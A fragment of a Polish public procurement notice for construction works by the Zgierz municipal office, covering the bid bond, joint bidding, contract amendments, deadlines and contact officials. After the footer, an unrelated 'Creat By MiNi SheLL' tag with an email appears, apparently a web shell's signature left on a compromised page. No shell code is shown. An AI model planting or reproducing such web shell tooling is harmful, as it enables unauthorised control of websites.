class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Oferta powinna być zabezpieczona wadium w wysokości: 3.000,00 zł, słownie złotych: trzy <br/>tysiące 00/100, wniesionym przed upływem terminu składania ofert i obejmującym okres <br/>związania ofertą, tj. okres rozpoczynający się wraz z upływem terminu składania ofert do dnia <br/>07.09.2021 r. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy: <br/>Bank PKO BP S.A. O/Zgierz 22 1020 3440 0000 7002 0067 1651. UWAGA: Terminem <br/>wniesienia wadium w formie pieniężnej jest termin uznania kwoty na rachunku Zamawiającego <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia winni złożyć pełnomocnictwo <br/>do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w <br/>postępowaniu i zawarcia umowy, o ile nie wynika ono z innych dokumentów załączonych przez <br/>Wykonawcę, np. z umowy konsorcjum. 2. Pełnomocnictwo, o którym mowa w pkt. 1, powinno <br/>wskazywać wszystkich Wykonawców, którzy wspólnie ubiegają się o udzielenie zamówienia <br/>publicznego, a także zawierać deklarację (podpisy) wszystkich mocodawców, co do <br/>ustanowienia pełnomocnika. 3. Spółka cywilna ubiegająca się o udzielenie zamówienia nie ma <br/>obowiązku powoływania pełnomocnika i może być reprezentowana przez wspólników - każdego <br/>wspólnika - na ogólnych zasadach reprezentacji spółki cywilnej, zgodnie z przepisami Kodeksu <br/>cywilnego, chyba że umowa lub uchwała wspólników stanowi odmiennie. 4. Jeżeli została <br/>wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający <br/>może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy <br/>regulującej współpracę tych Wykonawców. [art. 59 PZP]. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Stosownie do treści art. 455 ust. 1 PZP dopuszczalna jest zmiana umowy: 1) niezależnie od <br/>wartości tej zmiany, o ile została przewidziana w ogłoszeniu o zamówieniu lub dokumentach <br/>zamówienia, w postaci jasnych, precyzyjnych i jednoznacznych postanowień umownych, które mogą obejmować postanowienia dotyczące zasad wprowadzania zmian wysokości ceny, jeżeli <br/>spełniają one łącznie następujące warunki: a) określają rodzaj i zakres zmian, b) określają <br/>warunki wprowadzenia zmian, c) nie przewidują takich zmian, które modyfikowałyby ogólny <br/>charakter umowy; 2) gdy nowy Wykonawca ma zastąpić dotychczasowego Wykonawcę: a) <br/>jeżeli taka możliwość została przewidziana w postanowieniach umownych, o których mowa w <br/>pkt 1, lub b) w wyniku sukcesji, wstępując w prawa i obowiązki Wykonawcy, w następstwie <br/>przejęcia, połączenia, podziału, przekształcenia, upadłości, restrukturyzacji, dziedziczenia lub <br/>nabycia dotychczasowego Wykonawcy lub jego przedsiębiorstwa, o ile nowy Wykonawca <br/>spełnia warunki udziału w postępowaniu, nie zachodzą wobec niego podstawy wykluczenia oraz <br/>nie pociąga to za sobą innych istotnych zmian umowy, a także nie ma na celu uniknięcia <br/>stosowania przepisów ustawy, lub c) w wyniku przejęcia przez Zamawiającego zobowiązań <br/>Wykonawcy względem jego Podwykonawców, w przypadku, o którym mowa w art. 465 ust. 1 <br/>PZP; 3) jeżeli dotyczy realizacji, przez dotychczasowego Wykonawcę, dodatkowych dostaw, <br/>usług lub robót budowlanych, których nie uwzględniono w zamówieniu podstawowym, o ile stały <br/>się one niezbędne i zostały spełnione łącznie następujące warunki: a) zmiana Wykonawcy nie <br/>może zostać dokonana z powodów ekonomicznych lub technicznych, w szczególności <br/>dotyczących zamienności lub interoperacyjności wyposażenia, usług lub instalacji zamówionych <br/>w ramach zamówienia podstawowego, b) zmiana Wykonawcy spowodowałaby istotną <br/>niedogodność lub znaczne zwiększenie kosztów dla Zamawiającego, c) wzrost ceny <br/>spowodowany każdą kolejną zmianą nie przekracza 50% wartości pierwotnej umowy, z <br/>wyjątkiem należycie uzasadnionych przypadków; 4) jeżeli konieczność zmiany umowy <br/>spowodowana jest okolicznościami, których Zamawiający, działając z należytą starannością, nie <br/>mógł przewidzieć, o ile zmiana nie modyfikuje ogólnego charakteru umowy a wzrost ceny <br/>spowodowany każdą kolejną zmianą nie przekracza 50% wartości pierwotnej umowy. 2. <br/>Dopuszczalne są również zmiany umowy których łączna wartość jest mniejsza niż progi unijne <br/>oraz jest niższa niż 15%, w przypadku zamówień na roboty budowlane, a zmiany te nie <br/>powodują zmiany ogólnego charakteru umowy. 3. W przypadkach, o których mowa w ust. 1 pkt <br/>3 i 4, Zamawiający: 1) nie może wprowadzać kolejnych zmian umowy w celu uniknięcia <br/>stosowania przepisów ustawy; 2) po dokonaniu zmiany umowy, zamieszcza ogłoszenie o <br/>zmianie umowy w Biuletynie Zamówień Publicznych lub przekazuje Urzędowi Publikacji Unii Europejskiej. 4. Jeżeli umowa zawiera postanowienia dotyczące zasad wprowadzania zmian <br/>wysokości cen, dopuszczalną wartość zmiany ceny, o której mowa w ust. 1 pkt 3 lit. c i pkt 4, lub <br/>dopuszczalną wartość zmiany umowy, o której mowa w ust. 2, ustala się w oparciu o zmienioną <br/>cenę. 5. Stosownie do treści art. 454. ust. 1 PZP nie jest dopuszczalna istotna zmiana zawartej <br/>umowy z wyjątkiem przypadków wskazanych w powyższych ust. 1 do 3, przy czym zmiana <br/>umowy jest istotna, jeżeli powoduje, że charakter umowy zmienia się w sposób istotny w <br/>stosunku do pierwotnej umowy, w szczególności jeżeli zmiana: 1) wprowadza warunki, które <br/>gdyby zostały zastosowane w postępowaniu o udzielenie zamówienia, to wzięliby w nim udział <br/>lub mogliby wziąć udział inni Wykonawcy lub przyjęte zostałyby oferty innej treści; 2) narusza <br/>równowagę ekonomiczną stron umowy na korzyść Wykonawcy, w sposób nieprzewidziany w <br/>pierwotnej umowie; (...) pełny tekst znajduje się w § 15 Ogólnych warunków umowy, <br/>stanowiących załącznik nr 29.2.b do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-10 12:45</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/umz.zgierz</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-10 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-07</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Wszystkie kryteria, tj.: - cena, - okres gwarancji (całkowity, ale nie dłuższy niż 10 lat), -<br/>wysokość kar umownych, - zatrudnienie min. 1 osoby niepełnosprawnej lub bezrobotnej <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Osobami uprawnionymi do porozumiewania się z Wykonawcami są: w sprawach <br/>merytorycznych: 1) Adam Zamojski, główny specjalista, pok. nr 1, tel.: (42)714-32-44 ; w <br/>sprawach proceduralnych: 1) Ewa Stasiak, gł. specjalista pok. 219, tel.: (42) 714-32-00, 2) Lech <br/>Dąbski, naczelnik, pok. 219, tel.: (42) 714-31-64 oraz 3) Agnieszka Sobczak, główny specjalista, <br/>4) Małgorzata Garus, starszy inspektor, pok. 220, tel.: (42) 714-32-34.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-26 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com